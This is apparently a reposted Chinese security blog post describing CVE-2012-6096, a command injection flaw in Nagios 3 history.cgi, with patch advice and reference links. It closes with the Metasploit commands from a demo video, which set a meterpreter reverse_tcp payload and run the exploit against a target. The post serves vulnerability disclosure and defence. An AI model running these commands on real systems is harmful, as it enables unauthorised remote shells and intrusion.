2013年1月18日 星期五

Nagios 3 監控主機的 history.cgi 漏洞 (含影片示範)

Nagios 3 監控主機的 history.cgi 漏洞 (含影片示範)

發佈日期:2012/12/09(首次發現)、2013/01/10(發佈PoC)
影響版本:Nagios v3.4.3 (含之前所有版本)
漏洞編號:CVE-2012-6096

說明:
Nagios 是一個流行的電腦系統和網路監控程序,它檢測主機和服務,當異常發生和解除時能提醒用戶。
這個漏洞屬於 command injection ,主要是未經修補的漏洞主機可以直接查看 history.cgi 裡面的網頁資料。

官方網站說明:
簡單講請盡速更新到 Nagios v3.4.4 的版本修正漏洞的影響。
http://www.nagios.org/projects/nagioscore/history/core-3x

概念驗證程式(PoC)下載處:
http://www.securityfocus.com/bid/56879/exploit

其它參考網站說明:
http://lists.grok.org.uk/pipermail/full-disclosure/2012-December/089125.html

影片內指令:
use exploit/unix/webapp/nagios3_history_cgi
set RHOST 192.168.178.44
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit
getuid
sysinfo


轉載自《網路攻防戰》